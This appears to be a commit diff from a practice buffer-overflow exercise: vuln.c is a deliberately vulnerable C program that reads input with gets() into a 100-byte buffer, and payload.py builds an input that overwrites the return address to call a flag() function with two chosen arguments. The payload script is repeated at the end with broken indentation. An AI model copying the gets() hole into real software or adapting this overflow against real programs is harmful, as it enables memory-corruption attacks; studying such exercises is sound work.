mishazawa · April 10, 2024 21:56
diff --git a/payload.py b/payload.py
 junk_l =  22

 # can be different when compiled
 function_addr = b"\x56\x55\x61\xad"

 arg_a = b"\xde\xad\xbe\xef"
 arg_b = b"\xc0\xde\xd0\x0d"

 with open("./data", "wb") as f:
    junk = b"A" * junk_l
    
    # reverse bytes aka Little endian
    fun = function_addr[::-1] 
    a = arg_a[::-1]
    b = arg_b[::-1]

    # join payload and args(reverse order) and add offset between them
    f.write(junk + fun + b"junk" + b + a)
diff --git a/vuln.c b/vuln.c
 // gcc vuln.c -o vuln

 #include <stdio.h>

 void flag(int a, int b) {
  if (a == 0xdeadbeef && b == 0xc0ded00d) {
    printf("OK");
  }
 } 

 void vuln() {
  char input[100];
  gets(input);
  puts(input);
 }

 int main () {
  vuln();
  return 0;
 }
	junk_l = 22

	# can be different when compiled
	function_addr = b"\x56\x55\x61\xad"

	arg_a = b"\xde\xad\xbe\xef"
	arg_b = b"\xc0\xde\xd0\x0d"

	with open("./data", "wb") as f:
	junk = b"A" * junk_l

	# reverse bytes aka Little endian
	fun = function_addr[::-1]
	a = arg_a[::-1]
	b = arg_b[::-1]

	# join payload and args(reverse order) and add offset between them
	f.write(junk + fun + b"junk" + b + a)